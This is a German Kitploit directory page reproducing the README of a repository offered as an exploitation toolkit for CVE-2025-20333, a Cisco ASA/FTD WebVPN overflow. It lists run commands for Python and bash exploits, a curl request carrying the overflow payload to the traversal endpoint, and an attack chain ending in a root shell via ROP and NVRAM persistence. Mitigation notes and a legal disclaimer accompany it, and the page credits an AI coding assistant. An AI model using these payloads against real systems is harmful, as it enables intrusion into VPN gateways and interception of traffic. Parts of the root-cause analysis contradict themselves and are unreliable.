Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-20333 — Vollständiges Forschungs- und Exploitation-Toolkit für CVE-2025-20333, einen kritischen Stack-Pufferüberlauf in Cisco ASA/FTD WebVPN. Enthält detaillierte Binäranalyse, PoC-Exploits in Python und bash sowie einen Exploitation-Leitfaden. | Kitploit
Tools/GitHubGitHub/cobbbex/cve-2025-20333
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingBinary-Exploitation
GitHubcobbbex/cve-2025-20333

cve-2025-20333

Vollständiges Forschungs- und Exploitation-Toolkit für CVE-2025-20333, einen kritischen Stack-Pufferüberlauf in Cisco ASA/FTD WebVPN. Enthält detaillierte Binäranalyse, PoC-Exploits in Python und bash sowie einen Exploitation-Leitfaden.

Repository anzeigen
vor 10h 35mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-20333 – Vollständiges Forschungs- und Exploitation-Toolkit

Übersicht

Dieses Verzeichnis enthält umfassende Forschung, Analyse und Proof-of-Concept-Code für CVE-2025-20333, eine kritische Stack-Pufferüberlauf-Schwachstelle in Cisco ASA/FTD WebVPN-Servern.

Status: ⚠️ Aktiv in freier Wildbahn ausgenutzt (ArcaneDoor-Kampagne)
CVSS-Score: 9,8 Kritisch
Authentifizierung: Nein (umgangen über CVE-2025-20362)
Auswirkung: Remote-Codeausführung als root


Inhalt

📚 Dokumentation

()

CVE-2025-20333-RESEARCH-NOTES.md
20 KB

Vollständige Reverse-Engineering-Forschung

  • Schwachstellenkontext & Web-Intelligence
  • Binäranalyse (ASA 9.12.4.x lina-Prozess)
  • Prüfung der Request-Ingestion-Schicht
  • Analyse der Lua-API-Bindungen
  • 🎯 Overflow-Entdeckung (body_lexer.re2c, FUN_0302e690)
  • Angriffsketten-Aufschlüsselung
  • Root-Cause-Analyse mit Codemustern
  • Referenztabelle für Tools & Adressen

Wichtigste Erkenntnis:

root@kitploit:~
Fester 16-Byte-Puffer (local_58[16]) in body_lexer.re2c
URL-Decoding-Schleife hat KEINE GRENZPRÜFUNG
Schreiben auf local_58[iVar11] ohne Prüfung von iVar11 < 16
Nach 8 Hex-Paaren: Overflow → Stack-Korruption → RCE

EXPLOITATION-GUIDE.md (12 KB)

Praktisches Exploitation-Handbuch

  • Erklärung der Schwachstellenmechanik
  • Vollständige Angriffskette (CVE-2025-20362-Bypass + Overflow)
  • Schritt-für-Schritt-Exploitation-Anleitung
  • Payload-Erstellungstechniken
  • Netzwerkbasierte Erkennungsmethoden
  • Hostbasierte Erkennung & Log-Analyse
  • Minderungsstrategien
  • Gepatchte Versionen & Upgrade-Pfad
  • Rechtliche & ethische Überlegungen

🔧 Proof-of-Concept-Exploits

cve-2025-20333-poc.py (15 KB)

Voll ausgestatteter Python-Exploit

Funktionen:

  • Automatische Payload-Generierung
  • CVE-2025-20362-Pfad-Traversal-Integration
  • ROP-Gadget-Ketten-Konstruktion
  • SSL/TLS-Unterstützung
  • Konfigurierbares Timeout
  • Detaillierte Fortschrittsberichte

Verwendung:

root@kitploit:~
# Schwachstellendetails anzeigen
python3 cve-2025-20333-poc.py --details

# Ziel ausnutzen
python3 cve-2025-20333-poc.py 192.168.1.100 443

# Benutzerdefinierte Einstellungen
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30

cve-2025-20333-poc.sh (8,5 KB)

Leichter Bash-Exploit

Funktionen:

  • Keine Python-Abhängigkeit
  • Verwendet curl oder netcat
  • Minimaler Ressourcenverbrauch
  • Lehrreiche Kommentare
  • Klare Statusausgabe

Verwendung:

root@kitploit:~
# Details anzeigen
./cve-2025-20333-poc.sh --details

# Exploit
./cve-2025-20333-poc.sh 192.168.1.100 443 10

# Manuell mit curl
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure

Schwachstellen-Zusammenfassung

Kurzfakten

EigenschaftWert
CVE-IDCVE-2025-20333
TypStack-Pufferüberlauf (CWE-120)
Komponentebody_lexer.re2c (FUN_0302e690)
Betroffene VersionenASA 9.16–9.23, FTD 7.0–7.7
CVSS v3.19,8 (Kritisch)
AuthentifizierungNicht erforderlich (über CVE-2025-20362)
BenutzerinteraktionKeine
AuswirkungRCE als root, vollständige Systemkompromittierung
StatusAktiv ausgenutzt (Mai 2025+)
Verantwortungsvolle OffenlegungCisco hat gepatcht; Advisory veröffentlicht

Root Cause

root@kitploit:~
// body_lexer.re2c - URL-Decoding-Schleife
byte local_58[16];  // ← Fester 16-Byte-Puffer

while (parsing_request_body) {
    byte input = *data++;
    
    if (input == '%') {
        hex_decode_mode = true;
        hex_index = 0;
    }
    
    if (hex_decode_mode) {
        local_58[hex_index] = input;  // ← KEINE GRENZPRÜFUNG!
        hex_index++;
        
        if (hex_index == 2) {
            byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
            hex_decode_mode = false;
        }
    }
}

Overflow-Auslöser: 9+ aufeinanderfolgende %XX-Sequenzen im POST-Body

Angriffskette

root@kitploit:~
1. Angreifer (KEINE AUTH erforderlich)
   ↓
2. HTTP POST an /+CSCOU+/../+CSCOE+/files/file_list.json
   ├─ CVE-2025-20362: Pfad-Traversal umgeht Auth-Prüfung
   └─ Erreicht files_retr.lua-Endpunkt (auth_flag = 0)
   ↓
3. POST-Body: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
   (9+ URL-kodierte Paare)
   ↓
4. body_lexer.re2c verarbeitet POST-Body
   ├─ Akkumuliert Hex-Paare in local_58[16]
   └─ Nach 8 Paaren: OVERFLOW!
   ↓
5. Stack-Korruption
   ├─ Überschreibt local_48, local_40
   ├─ Überschreibt gespeichertes RBP
   └─ Überschreibt gespeichertes RIP (Rücksprungadresse)
   ↓
6. Kontrollfluss-Übernahme
   ├─ RIP zeigt auf ROP-Gadgets
   ├─ ROP-Kette richtet execve() ein
   └─ execve("/bin/sh", NULL, NULL)
   ↓
7. RCE als root (lina-Prozess läuft als root)
   ├─ Vollständige VPN-Server-Kompromittierung
   ├─ Zugriff auf den gesamten VPN-Verkehr
   └─ Persistenz über NVRAM-Modifikation

Forschungsprozess

Phase 1: Binäranalyse ✅

  • lina-Binärdatei in Ghidra geöffnet
  • WebVPN-Request-Architektur kartiert (HTTP-Parser, URL-Router, 13 Endpunkt-Hooks)
  • Request-Ingestion-Schicht geprüft (alle sicher über clString/exakte Größen-Allocs)
  • Lua-API-Bindungen untersucht (alle sicher)

Phase 2: Web-Intelligence ✅

  • Nach technischen Details zu CVE-2025-20333 gesucht
  • Rapid7-, Zscaler-, Horizon3-, Tenable-Analysen gefunden
  • Angriffskette mit /+CSCOU+/../+CSCOE+/files/file_list.json bestätigt
  • Root Cause identifiziert: heap-basierter (Web-Quellen) / stack-basierter (diese Binärdatei) Overflow im Lua-Endpunkt

Phase 3: Gezieltes Reversing ✅

  • body_lexer.re2c dekompiliert (FUN_0302e690)
  • GEFUNDEN: Fester 16-Byte-Puffer local_58[16] ohne Grenzprüfung
  • Overflow-Pfad bestätigt: URL-Decoding-Schleife → unbegrenztes Schreiben
  • Erreichbarkeit verifiziert: files_retr.lua → body_lexer → Stack-Overflow

Phase 4: Exploit-Entwicklung ✅

  • Python-PoC mit ROP-Ketten-Unterstützung erstellt
  • Bash-PoC für minimale Umgebungen erstellt
  • Payload-Struktur und Erstellungstechniken dokumentiert
  • Erkennungs- & Minderungsanleitung beigefügt

Verwendungsanleitung

Für autorisierte Penetrationstests

  1. Autorisierung verifizieren

    • Schriftliche Genehmigung für Tests einholen
    • Zielsystemdetails bestätigen (IP, Port, Version)
    • Umfang und Zeitplan dokumentieren
  2. Exploit ausführen

    root@kitploit:~
    # Schnellprüfung: Reagiert das Ziel auf den Exploit-Versuch?
    python3 cve-2025-20333-poc.py <ziel_ip>
    
    # Oder Bash-Version:
    ./cve-2025-20333-poc.sh <ziel_ip>
    
  3. Exploitation verifizieren

    • Auf Shell-Zugriff / Reverse-Shell-Verbindung prüfen
    • Systemprotokolle auf Abstürze oder Anomalien untersuchen
    • Nach modifizierten Dateien suchen (NVRAM, persistente Backdoor)
  4. Ergebnisse dokumentieren

    • Zielversion und Patch-Level aufzeichnen
    • Exploitation-Erfolg/-Misserfolg dokumentieren
    • Aufgetretene Verteidigungsmaßnahmen notieren
    • Dem Kunden mit Sanierungsempfehlungen berichten

Für Sicherheitsforschung

  1. Forschungsnotizen lesen

    • CVE-2025-20333-RESEARCH-NOTES.md studieren
    • Binärarchitektur und Overflow-Mechanismus verstehen
  2. PoCs studieren

    • Python-PoC für ROP-Gadget-Konstruktion prüfen
    • Bash-PoC für Minimal-Exploit prüfen
    • Payload-Kodierung verstehen
  3. Anpassen & Erweitern

    • Benutzerdefinierten Shellcode hinzufügen
    • Verschiedene Exploitation-Techniken implementieren
    • Auf gepatchten vs. anfälligen Versionen testen

Wichtige Warnungen

⚠️ RECHTLICHER HINWEIS

Dieses Toolkit wird nur für autorisierte Sicherheitstests bereitgestellt.

  • NICHT gegen Systeme ohne ausdrückliche schriftliche Genehmigung verwenden
  • NICHT für böswillige Zwecke verwenden (Datendiebstahl, Dienstunterbrechung, Ransomware)
  • Unautorisierter Zugriff verstößt gegen den Computer Fraud and Abuse Act (USA) und ähnliche Gesetze weltweit
  • Strafen umfassen Strafverfolgung, Geldstrafen und Haft

✅ Autorisierte Verwendung:

  • Penetrationstests mit schriftlicher Genehmigung
  • Proof-of-Concept während der Schwachstellenforschung
  • Interne Sicherheitstests
  • CTF-Wettbewerbe
  • Akademische Forschung

❌ Verbotene Verwendung:

  • Angriffe auf Systeme ohne Genehmigung
  • Ransomware-Bereitstellung
  • Datendiebstahl oder Erpressung
  • Dienstunterbrechung
  • Laterale Bewegung in kompromittierten Netzwerken

Dateimanifest

root@kitploit:~
cve-2025-20333/
├── README.md                              (diese Datei)
├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB, umfassende Forschung)
├── EXPLOITATION-GUIDE.md                 (12 KB, praktischer Leitfaden)
├── cve-2025-20333-poc.py                 (15 KB, Python-PoC)
└── cve-2025-20333-poc.sh                 (8,5 KB, Bash-PoC)

Gesamtdokumentation: ~65 KB
Forschungstiefe: 50+ Ghidra-Funktionen geprüft
Verifizierte Ergebnisse: Pufferüberlauf in body_lexer.re2c bestätigt


Schnellreferenz

Schnelltest der Schwachstelle

root@kitploit:~
# Testen, ob das Ziel für Exploitation anfällig ist
curl -X POST https://<ziel>/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
  --insecure \
  -i

# Wenn das Ziel antwortet (200, 500, Absturz), könnte es anfällig sein
# Wenn das Ziel blockiert/umleitet, könnte es gepatcht sein

Versionsprüfung

root@kitploit:~
# Anfällige Versionen:
# - Cisco ASA 9.16 bis 9.23
# - Cisco FTD 7.0 bis 7.7

# SSH/Konsole verwenden, um ASA-Version zu prüfen:
show version

# Gepatchte Versionen:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (gepatcht)

Minderungs-Checkliste

  • ASA/FTD-Version verifizieren
  • Nach verfügbaren Patches suchen
  • Bei Anfälligkeit auf gepatchte Version upgraden
  • WebVPN-Zugriff per IP-Adresse einschränken
  • Protokollierung und Überwachung aktivieren
  • Auf CVE-2025-20362-Pfad-Traversal-Versuche achten
  • Auf DoS-Muster überwachen (lina-Abstürze)
  • Firewall-Schutz auf dem WebVPN-Port aktivieren

Referenzen

  • Cisco Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
  • Rapid7-Analyse: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
  • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
  • Tenable FAQ: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

Haftungsausschluss

Dieses Toolkit wird WIE BESEHEN nur für Bildungs- und autorisierte Testzwecke bereitgestellt.

  • Verwendung auf eigene Gefahr
  • Keine Garantie oder Haftung für Missbrauch
  • Unautorisierter Zugriff ist illegal
  • Ergebnisse verantwortungsvoll an Cisco und betroffene Organisationen melden
  • Die Cybersicherheitsgesetze Ihres Landes befolgen


Namensnennung

Dieses Projekt wurde mit Unterstützung von Claude Code, dem KI-gestützten Coding-Assistenten von Anthropic, entwickelt.


Erstellt: 2026-08-23
Forschungszeitraum: 2026-08-22 bis 2026-08-23
Status: Vollständig & dokumentiert
Klassifizierung: Bildung / Nur autorisierte Tests

Tool herunterladen